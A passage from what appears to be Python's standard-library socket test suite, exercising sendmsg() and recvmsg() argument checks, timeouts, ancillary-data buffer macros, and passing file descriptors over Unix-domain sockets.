self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
